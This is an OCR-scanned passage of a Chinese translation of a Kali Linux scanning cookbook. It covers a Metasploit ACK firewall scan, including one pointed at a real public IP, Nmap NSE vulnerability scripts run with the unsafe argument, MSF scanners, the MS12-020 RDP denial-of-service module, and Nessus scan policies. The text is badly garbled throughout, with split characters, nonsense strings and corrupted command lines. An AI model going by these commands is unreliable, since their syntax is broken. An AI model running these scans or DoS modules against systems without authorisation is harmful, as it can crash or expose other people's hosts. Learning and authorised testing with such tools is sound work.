线程 数量 修改 为 20。 THREADS 的 值 定义 了 在 后 台 执 行 的 当前 任务 数量 。 确 定 线程 
数量 涉及 到 寻找 一 个 平衡 ， 既 能 提升 任务 速度 ， 又 不 会 过 度 消 耗 系统 资源 。 对 于 多 
数 系统 ，20 个 线程 可 以 足够 快 ， 并 且 相 当 合 理 。 修 改 了 必要 的 变量 之 后 ， 可 以 再 次 
使 用 show options 命令 来 验证 。 一 旦 所 需 配 置 验证 完毕 ， 就 可 以 执行 扫描 了 。 


msf auxiliary(ack) > run 


[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


这 个 例子 中 ， 唯 一 提供 的 输出 就 是 有 关 扫 描 的 源 信 息 ， 它 显示 了 被 扫描 系统 的 数 
量 ， 以 及 模块 执行 完毕 。 输 出 的 缺乏 是 因为 ， 和 SYN 以 及 ACK 注入 相关 的 响应 从 
一 个 端口 直接 到 达 另 一 个 端口 ， 因 为 Metasploitable2 系统 没有 任何 防火 墙 。 作 为 
替代 ， 如 果 我 们 在 packtpub.com 域 上 执行 相同 扫描 ， 通 过 将 RHOSTS 值 修改 为 
Jo CH KAY IP 地址， 我们 会 收 到 不 用 的 输出 。 因 为 这 个 主机 放 在 防火 墙 背后 ， 和 
未 过 滤 端 口 相关 的 响应 中 的 变化 如 下 : 


msf auxiliary(ack) > set RHOSTS 83.166.169.228 
RHOSTS => 83.166.169.228 
msf auxiliary(ack) > show options 


Module options (auxiliary/scanner/portscan/ack): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 1-100 yes Ports to scan (e.g. 22- 
25,80,110-900) 

RHOSTS 83.166.169.228 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 25 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 
msf auxiliary(ack) > run 
TCP UNFILTERED 83.166.169.228:80 


PA 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


工作 原理 


Metasploit 拥有 一 个 辅助 模块 ， 可 以 以 多 种 技巧 执行 防火 墙 识别 ， 这 些 技巧 之 前 讨 
但 是 ，Metasploit 也 提供 了 一 些 功能 来 分 析 防 火 墙 上 下 文 ， 可 以 用 于 其 它 信 
息 的 收集 甚至 是 利用 。 


第 五 章 漏洞 扫描 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


尽管 可 以 通过 查看 服务 指纹 的 结果 ， 以 及 研究 所 识别 的 版 本 的 相关 漏洞 来 识别 许多 
潜在 漏洞 ， 但 这 通常 需要 非常 大 量 时 间 。 存 在 更 多 的 精简 备 选 方案 ， 它 们 通常 可 以 
为 你 完成 大 部 分 这 项 工作 。 这些 备 选 方案 包括 使 用 自动 化 脚本 和 程序 ， 可 以 通过 扫 
措 远程 系统 来 识别 漏洞。 未 验证 的 漏洞 扫描 程序 的 原理 是 ， 向 服务 发 送 一 系列 不 同 
的 探 针 ， 来 尝试 获取 表明 漏洞 存在 的 响应 。 或 者 ， 经 验证 的 漏洞 扫描 器 会 使 用 提供 
所 安装 的 应 用 ， 运 行 的 服务 ， 文 件 系统 和 注册 表 内 容 信息 的 凭证 ， 来 直接 查询 远程 


5.1 Nmap 脚本 引擎 漏洞 扫描 
Nmap 脚 本 引擎 (NSE) 提供 了 大 量 的 脚本 ， 可 用 于 执行 一 系列 自动 化 任务 来 评估 


远程 系统 。 Kali 中 可 以 找到 的 现 有 NSE 脚 本 分 为 多 个 不 同 的 类 别 ， 其 中 之 一 是 漏洞 


识别 o 
准备 
要 使 用 NSE 执 行 漏洞 分 析 ， 你 需要 有 一 个 运行 TCP 或 UDP 网 络 服务 的 系统 。 在 


提供 的 示例 中 ， 会 使 用 存在 SMB 服务 漏洞 的 Windows XP 系统 。 有关 设置 
Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 “ 安 装 Windows Server" 秘籍。 


操作 步骤 


许多 不 同 的 方法 可 以 用 于 识别 与 任何 给 定 的 NSE 脚 本 相关 联 的 功能 。 最 有 效 的 方法 
之 一 是 使 用 位 于 Nmap 脚 本 目录 中 的 script.db 文件 。 要 查看 文件 的 内 容 ， 我 们 
可 以 使 用 cat 命令 ， 像 这 样 : 


root@KaliLinux:~# cat /usr/share/nmap/scripts/script.db | more 


Entry ( filename - "acarsd-info.nse", categories - ( "discovery" 

, "safe", } } 

Entry { filename = "address-info.nse", categories = { "default", 
"safe", } } 

Entry { filename = "afp-brute.nse", categories = { "brute", "int 

rusive", } } 

Entry { filename = "afp-ls.nse", categories = { "discovery", "sa 

fe", } } 

Entry { filename = "afp-path-vuln.nse", categories = { "exploit" 

, "intrusive", " vuln", } } 

Entry { filename = "afp-serverinfo.nse", categories = { "default 
", "discovery", "safe", } } 

Entry ( filename - "afp-showmount.nse", categories - ( "discover 

yl. "safe", ju 

Entry ( filename - "ajp-auth.nse", categories - ( "auth", "defau 

Tp "Safe", ) 3 

Entry { filename = "ajp-brute.nse", categories = { "brute", "int 
rusive", } } 

Entry { filename = "ajp-headers.nse", categories = { "discovery" 
, "Safe", } } 

Entry { filename = "ajp-methods.nse", categories = { "default", 
"safe", } } 

Entry { filename = "ajp-request.nse", categories = { "discovery" 


, "safe", } } 


这 个 script.db 文件 是 一 个 非常 简单 的 索引 ， 显 示 每 个 NSE 脚 本 的 文件 名 及 其 所 
属 的 类 别 。 这 些 类 别 是 标准 化 的 ， 可 以 方便 地 对 特定 类 型 的 脚本 进行 grep ° A 
洞 扫描 脚本 的 类 别名 称 是 vuln s 要 识别 所 有 漏洞 脚本 ， 需 要 对 vuln 术语 进 
ff grep ， 然 后 使 用 cut 命令 提取 每 个 脚本 的 文件 名 。 像 这 样 : 


root@KaliLinux:~# grep vuln /usr/share/nmap/scripts/script.db | 
Cue 0 NN 12 

afp-path-vuln.nse 

broadcast-avahi-dos.nse distcc-cve2004-2687.nse 
firewall-bypass.nse 

ftp-libopie.nse 

ftp-proftpd-backdoor.nse 
ftp-vsftpd-backdoor.nse 
ftp-vuln-cve2010-4221.nse 
http-awstatstotals-exec.nse 
http-axis2-dir-traversal.nse 

http-enum.nse http-frontpage-login.nse 
http-git.nse http-huawei-hg5xx-vuln.nse 
http-iis-webdav-vuln.nse 
http-litespeed-sourcecode-download.nse 
http-majordomo2-dir-traversal.nse 
http-method-tamper.nse http-passwd.nse 
http-phpself-xss.nse http-slowloris-check.nse 
http-sql-injection.nse 
http-tplink-dir-traversal.nse 


为 了 进一步 评估 上 述 列表 中 任何 给 定 脚本 ， 可 以 使 用 cat 命令 来 读 取 ,nse X 
件 ， 它 与 script.db 目录 相同 。 因 为 大 多 数 描 述 性 内 容 通常 在 文件 的 开头 ， 建 议 
你 将 内 容 传 递 给 more ， 以 便 从 上 到 下 阅读 文件 ， 如 下 所 示 : 


root@KaliLinux:~# cat /usr/share/nmap/scripts/smb-check-vulns.ns 
e | more 

local msrpc - require "msrpc" 

local nmap - require "nmap" 

local smb - require "smb" 

local stdnse - require "stdnse" 

local string - require "string" 

local table - require "table" 


description - [[ 

Checks for vulnerabilities: 

* MS08-067, a Windows RPC vulnerability 

* Conficker, an infection by the Conficker worm 

* Unnamed regsvc DoS, a denial-of-service vulnerability I accide 
ntally found in Windows 2000 

* SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 9754 
97) 

* MS06-025, a Windows Ras RPC service vulnerability 

* MS07-029, a Windows Dns Server RPC service vulnerability 


WARNING: These checks are dangerous, and are very likely to brin 

g down a server. These should not be run in a production environ 

ment unless you (and, more importantly, the business) understand 
the risks! 


在 提供 的 示例 中 ， 我 们 可 以 看 到 smb-check-vulns.nse 脚本 检测 SMB 服务 相关 
的 一 些 拒 绝 服务 和 远程 执行 漏洞 。 这 里 ， 可 以 找到 每 个 评估 的 漏洞 描述 ， 以 及 
Microsoft 补丁 和 CVE 编号 的 引用 ， 还 有 可 以 在 线 查 询 的 其 他 信息 。 通过 进一步 阅 
读 ， 我 们 可 以 进一步 了 解 脚本 ， 像 这 样 : 


- -Qusage 

-- nmap 

--script smb-check-vulns.nse -p445 «host» 

-- sudo nmap -sU -sS 

--script smb-check-vulns.nse -p U:137,T:139 «host» 
---@output 


-- Host script results: 
| smb-check-vulns: 
| MS08-067: NOT VULNERABLE 
| Conficker: Likely CLEAN 
-- | regsvc DoS: regsvc DoS: NOT VULNERABLE 
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 
| MS06-025: NO SERVICE (the Ras RPC service is inactive) 
| MS07-029: NO SERVICE (the Dns Server RPC service is inact 


--- @args unsafe If set, this script will run checks that, if th 
e system isn't 

-- patched, are basically guaranteed to crash something. R 
emember that 

-- non-unsafe checks aren't necessarily safe either) 

-- (args safe If set, this script will only run checks that ar 
e known (or at 

-- least suspected) to be safe. 


通过 进一步 阅读 ， 我 们 可 以 找到 脚本 特定 的 参数 ， 适 当 的 用 法 以 及 和 脚本 预期 输出 的 
示例 的 详细 信息 。 要 注意 一 个 事实 ， 有 一 个 不 安全 的 参数 ， 可 以 设置 为 值 0 (未 激 
活 ) 或 1 (激活 ) 。 这 实际 上 是 Nmap 漏 洞 脚本 中 的 一 个 常见 的 现象 ， 理 解 它 的 用 法 
很 重要 。 默 认 情 况 下 ， 不 安全 参数 设置 为 0。 当 设置 此 值 时 ，Nmap 不 执行 任何 可 能 
导致 拒绝 服务 的 测试 。 虽 然 这 听 起 来 像 是 最 佳 选 择 ， 但 它 通 常 意味 着 许多 测试 的 结 
果 将 不 太 准 确 ， 并 且 一 些 测试 根本 不 会 执行 。 建 议 激活 不 安全 参数 以 进行 更 彻底 和 
准确 的 扫描 ， 但 这 只 应 在 授权 测试 情况 下 针对 生产 系统 执行 。 要 运行 漏洞 扫描 ， 应 
使 用 nmap --script 参数 定义 特定 的 NSE 脚 本 ， 并 使 

用 nmap --script-args 参数 传递 所 有 脚本 特定 的 参数 。 此 外 ， 要 以 最 小 的 干扰 
输出 来 运行 漏洞 扫描 ， 应 将 Nmap 配 置 为 仅 扫描 与 被 扫描 服务 对 应 的 端口 ， 如 下 所 
m 


root@KaliLinux:~# nmap --script smb-check-vulns.nse --scriptargs 
=unsafe=1 -p445 172.16.36.225 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-03-09 03:58 EDT 
Nmap scan report for 172.16.36.225 

Host is up (0.00041s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:18:11:FB (VMware) 


Host script results: 

| smb-check-vulns: 

| MS08-067: VULNERABLE 

| Conficker: Likely CLEAN 

| regsvc DoS: NOT VULNERABLE 

| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE 

| MS06-025: NO SERVICE (the Ras RPC service is inactive) 

|. MS07-029: NO SERVICE (the Dns Server RPC service is inactive 
) 


Nmap done: 1 IP address (1 host up) scanned in 18.21 seconds 


还 有 一 个 需要 注意 的 NSE 脚 本 ， 因 为 它 提 供 了 一 个 重要 的 漏洞 扫描 方式 。 这 个 脚本 
是 smb-vulnmsi0-061.nse 。 这 个 脚本 的 细节 可 以 通过 使 用 cat 命 
4 pipe 到 more ， 从 上 到 下 阅读 脚本 来 获得 : 


root@KaliLinux:~# cat /usr/share/nmap/scripts/smb-vuln-ms10-061. 
nse | more 

local bin - require "bin" 

local msrpc - require "msrpc" 

local smb - require "smb" 

local string - require "string" 

local vulns - require "vulns" 

local stdnse - require "stdnse" 

description - [[ 

Tests whether target machines are vulnerable to ms10-061 Printer 
Spooler impersonation vulnerability. 


tha € Stuxnet xk 4] A 853 va MAL 9 该 脚本 以 安全 的 方式 检查 vuln ， 而 
没有 崩溃 远程 系统 的 可 能 性 ， 因 为 这 不 是 内 存 损坏 漏洞 。 为 了 执行 检测 ， 它 需要 访 
问 远程 系统 上 的 至 少 一 个 共享 打印 机 。 默认 情况 下 ， 它 尝试 使 用 LANMAN API 枚 举 
打印 机 ， 在 某 些 系统 上 通常 不 可 用 。 在 这 种 情况 下 ， 用 户 应 将 打印 机 共享 名 称 指定 
为 打印 机 脚本 参数 。 要 查找 打印 机 共享 ， 可 以 使 用 smb-enum-share ° 


此 外 ， 在 某 些 系统 上 ， 访 问 共享 需要 有 效 的 凭据 ， 可 以 使 用 smb 库 的 参数 
smbuser 和 smbpassword 指定 。 我 们 对 这 个 漏洞 感 兴趣 的 原因 是 ， 在 实际 被 利 
用 之 前 ， 必 须 满足 多 个 因素 必须 。 首 先 ， 系 统 必 须 运 行 涉及 的 操作 系统 之 一 (XP， 
Server 03 SP2 > Vista > Server 08 或 Windows 7) 。 第 二 ， 它 必须 缺少 MS10-061 


补丁 ， 这 个 补丁 解决 了 代码 执行 漏洞 。 最 后 ， 系 统 上 的 本 地 打印 共享 必须 可 公开 访 
问 。 有 趣 的 是 ， 我 们 可 以 审计 SMB 远程 后 台 打 印 处 理 程序 服务 ， 以 确定 系统 是 否 

打 补 丁 ， 无 论 系 统 上 是 否 共享 了 现 有 的 打印 机 。 正 因为 如 此 ， 对 于 什么 是 漏洞 系统 
存在 不 同 的 解释 。 一 些 漏 洞 扫描 程序 会 将 未 修补 的 系统 识别 为 漏洞 ， 但 漏洞 不 能 被 
实际 利用 。 或 者 ， 其 他 漏洞 扫描 程序 (如 NSE 脚 本 ) 将 评估 所 有 所 需 条 件 ， 以 确定 
系统 是 否 易 受 攻击 。 在 提供 的 示例 中 ， 扫 描 的 系统 未 修补 ， 但 它 忆 也 没有 共享 远 元 程 打 
印 机 。 看 看 下 面 的 例子 : 


root@KaliLinux:~# nmap -p 445 172.16.36.225 --script-smb-vuln-ms 
10-061 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-03-09 04:19 EDT 
Nmap scan report for 172.16.36.225 

Host is up (0.00036s latency). 

PORT STATE SERVICE 

445/tcp open microsoft-ds 

MAC Address: 00:0C:29:18:11:FB (VMware) 


Host script results: 
| smb-vuln-ms10-061: false 


Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds 


在 提供 的 示例 中 ，Nmap 已 确定 系统 不 多 受 攻击 ， 因 为 它 没有 共享 远程 打印 机 。 尽 
管 确实 无 法 利用 此 漏洞 ， 但 有 些 人 仍然 声称 该 漏洞 仍然 存在 ， 因 为 系统 未 修补 ， 并 
且 可 以 在 管理 员 决 定 从 该 设备 共享 打印 机 的 情况 下 利用 此 漏洞 。 这 就 是 必须 评估 所 
有 汤 洞 扫描 程序 的 结果 的 原因 ， 以 便 完 全 了 解 其 2 ER o 一些 扫描 其 仅 选 择 评估 有 限 
的 条 件 ， 而 其 他 扫描 其 更 彻底 。 这 里 很 难 判 断 最 好 的 答案 是 什么 。 大 多 数 渗透 测试 
ART 更 刘欢 被 告知 系统 由 于 环境 变量 而 不 易 受 到 攻击 ， 因 此 他 们 不 会 花 必 无 数 
小 时 来 试图 利用 不 能 利用 的 漏洞 。 或 者 ， 系 统管 理 员 可 能 更 喜欢 知道 系统 缺少 

MS10-061 补 丁 ， 以 便 系 统 可 以 完全 安全 ， 即 使 在 现 有 条 件 下 不 能 利用 漏洞 。 


工作 原理 


大 多 数 漏洞 扫描 程序 通过 评估 多 个 不 同 的 响应 ， 来 尝试 确定 系统 是 否 容易 受 特 定 攻 
击 。 在 一 些 情况 下 ， 汤 洞 扫描 可 以 简化 为 与 远程 服务 建立 TCP 连 接 ， 并 且 通 过 自 开 
放 的 特征 来 识别 已 知 的 漏洞 版 本 。 在 其 他 情况 下 ， 可 以 向 远程 服务 发 送 一 系列 复杂 
的 特定 的 探测 请 求 ， 来 试图 请 求 对 服务 唯一 的 响应 ， 该 服务 易 受 特定 的 攻击 。 在 
NSE AAA Kel P > toRB ET unsafe 参数 ， 漏 洞 扫描 实际 上 将 尝试 利用 此 
漏洞 。 


5.2 MSF 辅助 模块 漏洞 扫描 


与 NSE 中 提供 的 漏洞 扫描 脚本 类 似 ，Metasploit 还 提供 了 一 些 有 用 的 漏洞 扫描 程 
Fro 类似 于 Nmap 的 脚本 ， 大 多 数 是 相当 有 针对 性 的 ， 用 于 扫描 特定 的 服务 。 


准备 


要 使 用 MSF 辅助 模块 执行 漏洞 分 析 ， 你 需要 有 一 个 运行 TCP 或 UDP 网 络 服务 的 
系统 。 在 提供 的 示例 中 ， 会 使 用 存在 SMB 服务 漏洞 的 Windows XP 系统 。 有 关 
设置 Windows 系统 的 更 多 信息 ， 请 参阅 本 书 第 一 章 “ 安 装 Windows Server 秘 籍 。 


有 多 种 不 同 的 方法 可 以 用 于 确定 Metasploit 中 的 漏洞 扫描 辅助 模块 。 一 种 有 效 的 方 
法 是 浏览 辅助 扫描 器 目录 ， 因 为 这 是 最 常见 的 漏洞 识别 脚本 所 在 的 位 置 。 看 看 下 面 
的 例子 : 


root@KaliLinux:/usr/share/metasploit -framework/modules/auxiliary 
/scanner/ 

mysql# cat mysql_authbypass_hashdump.rb | more 

TH 

# This file is part of the Metasploit Framework and may be subje 
ct to 

# redistribution and commercial restrictions. Please see the Met 
asploit 

4 web site for more information on licensing and terms of use. 

4 http://metasploit.com/ 

TH 


require 'msf/core' 
class Metasploit3 < Msf::Auxiliary 


include Msf::Exploit::Remote::MYSQL 
include Msf::Auxiliary::Report 


include Msf::Auxiliary::Scanner 


def initialize 


super( 
' Name ' => 'MySQL Authentication Bypass Passw 
ord Dump', 
'Description' => %Q{ 


This module exploits a password bypass vulnerabili 
ty in MySQL in order to extract the usernames and encrypted pass 
word hashes from a MySQL server. These hashes are stored as loot 

for later cracking. 


这 些 脚本 的 布局 是 相当 标准 化 的 ， 任 何 给 定 脚本 的 描述 可 以 通过 使 用 cat 命令 ， 
然后 将 输出 pipe 到 more ， 从 上 到 下 阅读 脚本 来 确定 。 在 提供 的 示例 中 ， 我 们 
可 以 看 到 该 脚本 测试 了 MySQL 数 据 库 服 务 中 存在 的 身份 验证 绕 过 漏洞 。 或 者 ， 可 
以 在 MSF 控制 台 界 面 中 搜索 漏洞 识别 模块 。 要 打开 它 ， 应 该 使 用 msfconsole 命 
Ao 搜索 命令 之 后 可 以 与 服务 相关 的 特定 关键 字 一 同 使 用 ， 或 者 可 以 使 

用 scanner 关键 字 查 询 辅 助 /扫描 器 目录 中 的 所 有 脚本 ， 像 这 样 : 


msf » search scanner 


Matching Modules 


Disclosure Date Rank Description ---- 


auxiliary/admin/smb/check_dir_file 
normal SMB Scanner Check File/Dire 
ctory Utility 
auxiliary/bnat/bnat_scan 
normal BNAT Scanner 
auxiliary/gather/citrix_published_applications 
normal Citrix MetaFrame ICA Publis 
hed Applications Scanner 
auxiliary/gather/enum_dns 
normal DNS Record Scanner and Enum 
erator 
auxiliary/gather/natpmp_external_address 
normal NAT-PMP External Address Sc 
anner 
auxiliary/scanner/afp/afp_login 
normal Apple Filing Protocol Login 
Utility 
auxiliary/scanner/afp/afp_server_info 
normal Apple Filing Protocol Info 
Enumerator 
auxiliary/scanner/backdoor/energizer_duo_detect 
normal Energizer DUO Trojan Scanne 


auxiliary/scanner/db2/db2_auth 
normal DB2 Authentication Brute Fo 
rce Utility 


在 识别 看 起 来 有 希望 的 脚本 时 ， 可 以 使 用 use 命令 结合 相对 路 径 来 激活 该 脚本 。 
一 旦 激活 ， 以 下 info 命令 可 用 于 读 取 有 关 脚 本 的 其 他 详细 信息 ， 包 括 详细 信息 ， 
描述 ， 选 项 和 引用 : 


msf > use auxiliary/scanner/rdp/ms12 020 check 
msf  auxiliary(ms12 020 check) > info 


Name: MS12-020 Microsoft Remote Desktop Checker 
Module: auxiliary/scanner/rdp/ms12 020 check 
Version: 0 

License: Metasploit Framework License (BSD) 
Rank: Normal 


Provided by: 
Royce Davis QR3dy <rdavis@accuvant.com> 
Brandon McCann Qzeknox <bmccann@accuvant.com> 


Basic options: 


Name Current Setting Required Description 
---- 0000 4-2. 00.1.2 -0-.-.------ RHOSTS 
yes The target address range or CIDR identif 

ier 

RPORT 3389 yes Remote port running RDP 

THREADS 1 yes The number of concurrent 
threads 
Description: 

This module checks a range of hosts for the MS12-020 vulnera 
bility. 


This does not cause a DoS on the target. 


一 旦 选择 了 模块 ， show options 命令 可 用 于 识别 和 /或 修改 扫描 配置 。 此 
显示 四 个 列 标题 ， 包 括 Name ，Current Setting ，Required 
和 Description 。 Name 列 标 识 每 个 可 配置 变量 的 名 称 。 


将 


Current Setting 列 列 出 任何 给 定 变 量 的 现 有 配置 。 Required 列 标识 任何 给 


定 变量 是 否 需 要 值 。 Description 列 描述 每 个 变量 的 函数 。 可 以 通过 使 
用 set 命令 并 提供 新 值 作为 参数 ， 来 更 改 任何 给 定 变量 的 值 ， 如 下 所 示 : 


msf  auxiliary(ms12 020 check) > set RHOSTS 172.16.36.225 
RHOSTS -» 172.16.36.225 
msf  auxiliary(ms12 020 check) > run 


[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed In this particular case 
, the system was not found to be vulnerable. However, in the cas 
e that a vulnerable system is identified, there is a correspondi 
ng exploitation module that can be used to actually cause a deni 
al-of-service on the vulnerable system. This can be seen in the 
example provided: 


msf  auxiliary(ms12 020 check) > use auxiliary/dos/windows/rdp/m 
s12 020 maxchannelids 
msf  auxiliary(ms12 020 maxchannelids) > info 


Name: MS12-020 Microsoft Remote Desktop Use-After-Free Do 
S Module: auxiliary/dos/windows/rdp/ms12 020 maxchannelids 


Version: 0 
License: Metasploit Framework License (BSD) 
Rank: Normal 


Provided by: 
Luigi Auriemma Daniel Godas-Lopez 
Alex Ionescu jduck <jduck@metasploit.com> #ms1i2-020 


Basic options: 
Name Current Setting Required Description 


RHOST yes The target address 
RPORT 3389 yes The target port 
Description: 


This module exploits the MS12-020 RDP vulnerability original 
ly discovered and reported by Luigi Auriemma. 

The flaw can be found in the way the T.125 ConnectMCSPDU pac 
ket is handled in the maxChannelIDs field, which will result an 
invalid pointer being used, therefore causing a denial-of-servic 
e condition. 


工作 原理 


大 多 数 漏 洞 扫描 程序 会 通过 评估 多 个 不 同 的 响应 来 尝试 确定 系统 是 否 容易 受 特定 攻 
击 。 一 些 情况 下 ， 漏 洞 扫描 可 以 简化 为 与 远程 服务 建立 TCP 连 接 并 且 通 过 自我 公开 
的 特征 ， 识 别 已 知 的 漏洞 版 本 。 在 其 他 情况 下 ， 可 以 向 远程 服务 发 送 一 系列 复杂 的 
特定 的 探测 请 求 ， 来 试图 请 求 对 服务 唯一 的 响应 ， 该 服务 易 受 特定 的 攻击 。 在 前 面 
的 例子 中 ， 脚 本 的 作者 很 可 能 找到 了 一 种 方法 来 请 求 唯一 的 响应 ， 该 响应 只 能 由 修 
补 过 或 没有 修补 过 的 系统 生成 ， 然 后 用 作 确 定 任何 给 定 的 是 否 可 利用 的 基础 。 


5.3 使 用 Nessus 创建 扫描 策略 


Nessus 是 最 强大 而 全 面 的 漏洞 扫描 器 之 一 。 通 过 定位 一 个 系统 或 一 组 系统 ， 
Nessus 将 自动 扫描 所 有 可 识别 服务 的 大 量 漏洞 。 可 以 在 Nessus 中 构建 扫描 策略 ， 
以 更 精确 地 定义 Nessus 测 试 的 漏洞 类 型 和 执行 的 扫描 类 型 。 这 个 秘籍 展示 了 如 何 
在 Nessus 中 配置 唯一 的 扫描 策略 。 


准备 
要 在 Nessus 中 配置 扫描 策略 ， 必 须 首先 在 Kali Linuxze3& 31 iX - 6 LX X Nessus 83 


功能 副本 。 因为 Nessus 是 一 个 需要 许可 的 产品 ， 它 不 会 在 Kali 默 认 安 装 。 有 关 如 
何在 Kali 中 安装 Nessus 的 更 多 信息 ， 请 参阅 第 一 章 中 的 “Nessus 安装 "秘籍 。 


操作 步骤 


要 在 Nessus 中 配置 新 的 扫描 策略 ， 首 先 需 要 访问 Nessus Web 

€: https:// localhost: 8834 或 https://127.0.0.1:8834 。 或 者 ， 如 果 
你 不 从 运行 Nessus 的 相同 系统 访问 Web 界 面 ， 则 应 指定 相应 的 IP 地 址 或 主机 名 。 加 
载 Web 界 面 后 ， 你 需要 使 用 在 安装 过 程 中 配置 的 帐户 或 安装 后 构建 的 其 他 帐户 登 

录 。 登录 后 ， 应 选择 页 面 顶部 的 Policy 选项 卡 。 如 果 没 有 配置 其 他 策略 ， 您 将 看 
到 一 个 空 列表 和 一 个 New Policy 按钮 。 点 击 该 按钮 来 开始 构建 第 一 个 扫描 策 

Wi o 

单 击 New Policy 后 ， Policy Wizard 屏幕 将 弹出 一 些 预 配置 的 扫描 模板 ， 可 用 
于 加 快 创建 扫描 策略 的 过 程 。 如 下 面 的 屏幕 截图 所 示 ， 每 个 模板 都 包含 一 个 名 称 ， 
然后 简要 描述 其 预期 功能 : 


Policy Wizards 


人 ¥A 


Host Discovery Basic Network Scan Credentialed Patch Audit 


£ © L] 


Web Application Tests Windows Malware Scan Mobile Device Scan 


在 大 多 数 情 况 下 ， 这 些 预 配置 的 扫描 配置 文件 中 ， 至 少 一 个 与 你 尝试 完成 的 配置 相 
似 。 可 能 所 有 这 些 中 最 常用 的 是 Basic Network Scan 。 要 记 住 ， 选 择 任 何 一 个 
选项 后 ， 仍 然 可 以 修改 现 有 配置 的 每 个 详细 信息 。 它们 只 是 在 那里 ， 让 你 更 快 开 


始 。 或 者 ， 如 果 你 不 想 使 用 任何 现 有 模板 ， 您 可 以 向 下 滚动 并 选 
择 Advanced Policy 选项 ， 这 会 让 你 从 头 开始 。 


的 模板 ， 您 可 以 通过 三 步 快速 的 过 程 来 完成 扫描 配置 。 该 
程 分 为 以 下 步 又 
又 1 允许 您 配置 基本 详细 信息 ， 包 括 配 置 文件 名 称 ， 描 述 和 可 见 性 (公共 或 
22) 。 公 开 的 个 人 资料 将 对 所 有 Nessus 用 户 可 见 ， 而 私人 个 人 只 有 创建 它 
的 用 户 才 能 看 到 。 
2. 步骤 2 将 简单 地 询问 扫描 是 内 部 扫描 还 是 外 部 扫描 。 外 部 扫描 将 是 针对 可 公共 
访问 的 主机 执行 的 ， 通 常 位 于 企业 网 络 的 DMZ 中 。 外 部 扫描 不 要 求 你 处 于 同 
一 网 络 ， 但 可 以 在 Internet 上 执行 。 或 者 ， 从 网 络 内 执行 内 部 扫描 ， 并 且 需 要 
直接 访问 扫描 目标 的 LAN © 
3. 又 3， 最 后 一 步 ， 使 用 SSH 或 Windows 身 份 验 证 请 求 扫描 设备 的 身份 验证 赁 
。 完 成 后 ， a Profiles 选项 卡 时 ， 可 以 在 先前 为 空 的 列表 中 看 到 新 的 
配置 文件 。 像 这 样 : 


All Policies Name v 


Example Policy 


这 种 方法 可 以 快速 方便 地 创建 新 的 扫描 配置 文件 ， 但 不 能 完全 控制 测试 的 漏洞 和 执 
行 的 扫描 类 型 。 要 修改 更 详细 的 配置 ， 请 单 击 新 创建 的 策略 名 称 ， 然 后 单 

击 Advanced Mode 链接 ， o 此 配置 模式 下 的 选项 非常 全 面 和 具体 。 可 以 在 屏幕 左 
侧 访 问 四 个 不 同 的 菜单 ， 这 包括 : 

General Settings (常规 设置 ) 菜 V gs , ye Ud 


服务 枚 举 的 详细 端口 扫描 选项 ， ju ur 度 ， 节 流 ， 并 行 性 等 策略 的 性 能 
项 o 


Credentials = 凭证 ) 菜单 可 以 配置 Windows，SSH > Kerberos 凭据， 其 至 
一 些 明文 协议 选 ° 


Plugins (4&fF) : 此 菜单 提供 对 Nessus 插 件 的 极其 精细 的 控制 。 是 
Nessus 中 用 于 执行 特定 审计 或 漏洞 检查 的 项 目 。 你 可 以 根据 功能 类 型 启用 或 禁用 
审计 组 ， 或 者 和 逐个 操作 特定 的 插件 。 


Preferences (首选 项 ) : 此 菜单 涵盖 了 Nessus 所 有 操作 功能 的 更 模糊 的 配置 ， 
例如 HTTP 身 份 验证 ， 爆 破 设置 和 数据 库 交 互 。 


工作 原理 


扫描 策略 定义 了 Nessus 所 使 用 的 值 ， 它 定义 了 如 何 运 行 扫 描 。 这 些 打 描 策略 像 完 
成 简单 扫描 向 导 设 置 所 需 的 三 个 步骤 一 样 简单 ， 或 者 像 定义 每 个 独特 插件 并 应 用 自 
定义 认证 和 操作 配置 一 样 复杂 。 


5.4 Nessus 漏洞 扫描 


Nessus 是 最 强大 和 全 面 的 漏洞 扫描 器 之 一 。 通 过 定位 一 个 系统 或 一 组 系统 ， 
Nessus 能 够 自动 扫描 所 有 可 识别 服务 的 大 量 漏 洞 。 一 旦 配置 了 扫描 策略 来 定义 
Nessus 扫 描 器 的 配置 ， 扫 描 策略 可 用 于 对 远程 目标 执行 扫描 并 进行 评估 。 这 个 秘籍 
将 展示 如 何 使 用 Nessus 执 行 漏洞 扫描 。 


准备 


要 在 Nessus 中 配置 扫描 策略 ， 必 须 首 先 在 Kali Linux 活 透 测试 平台 上 安装 Nessus 的 
功能 副本 。 因为 Nessus 是 一 个 需要 许可 的 产品 ， 它 不 会 在 Kali 默 认 安 装 。 有 关 如 
何在 Kali 中 安装 Nessus 的 更 多 信息 ， 请 参阅 第 一 章 中 的 “Nessus 安装 "秘籍 。 


此 外 ， 在 使 用 Nessus 扫 描 之 前 ， 需 要 创建 至 少 一 个 扫描 策略 。 有 关 在 Nessus 中 创 
建 扫描 策略 的 更 多 信息 ， 请 参阅 上 一 个 秘籍 。 


操作 步骤 


要 在 Nessus 中 开始 新 的 扫描 ， 您 需要 确保 在 屏幕 顶部 选择 了 Scans 选项 卡 。 wR 
过 去 没有 运行 扫描 ， 则 会 在 屏幕 中 央 生成 一 个 宝 列 表 。 要 执行 第 一 次 扫描 ， 您 需要 
单 击 屏 幕 左 侧 的 蓝 色 New Scan 按钮 ， 像 这 样 : 


My Scans 
No scans have been generated 


Trash 


> All Scans 


这 需要 一 些 基 本 的 配置 信息 。 系 统 将 提示 你 输入 一 系列 字段 ， 包 括 Name , 

